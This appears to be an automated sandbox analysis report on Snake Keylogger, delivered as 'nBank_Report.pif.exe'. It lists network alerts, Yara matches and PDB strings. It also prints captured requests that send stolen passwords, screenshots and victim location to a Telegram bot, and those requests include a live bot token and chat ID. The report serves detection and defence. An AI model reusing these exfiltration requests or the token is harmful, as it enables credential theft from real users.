              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49848 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49849 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49850 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49851 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49852 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49853 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49854 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49855 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49856 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49857 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49858 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49859 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49860 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49861 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49862 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49863 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49864 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49865 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49866 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49868 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49869 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49870 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49871 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49872 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49873 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49874 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49875 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49876 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49877 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49878 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49879 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49880 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49881 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49882 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49882 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49883 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49884 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49885 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49886 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49888 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49890 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49892 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49894 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49896 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49898 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49900 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49902 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49904 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49906 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49908 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49910 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49912 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49914 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49916 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49918 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49920 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49922 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49924 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49926 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49928 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49930 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49932 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49934 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49936 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49938 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49940 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49942 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49944 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49946 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49948 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49950 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49952 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49954 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49956 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49958 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49960 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49962 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49964 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49967 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49969 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49971 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49973 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49975 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49977 version: TLS 1.2
              Source: nBank_Report.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: HP[o(C:\Windows\fLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\fLpg.pdbpdbLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1713708218.0000000000C67000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\exe\fLpg.pdb{ source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: symbols\exe\fLpg.pdbgo7k source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.PDB source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: fLpg.pdbs\fLpg.pdbpdbLpg.pdbpg.pdbP source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: !!.pdb"s source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdbp source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.Configuration.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1713708218.0000000000C67000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\fLpg.pdbk source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.Configuration.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: fLpg.pdb``w` source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\fLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.Core.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbX~ source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: mscorlib.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\fLpg.pdbl source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1713708218.0000000000C67000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ?goC:\Users\user\AppData\Roaming\fLpg.pdbdwe source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: @go.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb+ source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdblJ source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1713708218.0000000000C67000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: fLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006190000.00000004.00000020.00020000.00000000.sdmp, nBank_Report.pif.exe, VtPPJdSqnkbmja.exe.0.dr
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.PDB source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: fLpg.pdbSHA256!t source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006190000.00000004.00000020.00020000.00000000.sdmp, nBank_Report.pif.exe, VtPPJdSqnkbmja.exe.0.dr
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\fLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER8EF6.tmp.dmp.17.dr
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 06795911h8_2_06795660
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 06794791h8_2_067944E0
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 06793377h8_2_06793198
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 06793D01h8_2_06793198
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 06795ED8h8_2_06795AC0
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_06792698
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 067954B1h8_2_06795200
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 06795ED8h8_2_06795E06
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_06792EBD
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_06792CDB
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 06795051h8_2_06794DA0
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 06795ED8h8_2_06795AB0
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 06794BF1h8_2_06794940
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeCode function: 4x nop then jmp 0679FC31h8_2_0679F988
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeCode function: 4x nop then jmp 073A215Ah10_2_073A1A4A

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49747 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49746 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49745 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49740 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49751 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49749 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49753 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49755 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49757 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49760 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49762 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49764 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49766 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49768 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49770 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49774 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49778 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49780 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49784 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49772 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49776 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.10:49782 -> 149.154.167.220:443
              Uses the Telegram API (likely for C&C communication)
              Source: unknownDNS query: name: api.telegram.org
              Source: unknownDNS query: name: api.telegram.org
              Yara detected Generic Downloader
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdea6f6d70bdcHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf231755d157Host: api.telegram.orgContent-Length: 546
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf347345ddbcHost: api.telegram.orgContent-Length: 546
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf486d1d1a62Host: api.telegram.orgContent-Length: 546
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf59b14a5f3aHost: api.telegram.orgContent-Length: 673736
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf76cf5442d3Host: api.telegram.orgContent-Length: 546
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf85526113d3Host: api.telegram.orgContent-Length: 673736
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdf9fa088b6caHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdfb0ac711bdaHost: api.telegram.orgContent-Length: 673762
              Source: global trafficHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdfcd6c46c515Host: api.telegram.orgContent-Length: 546Connection: Keep-Alive
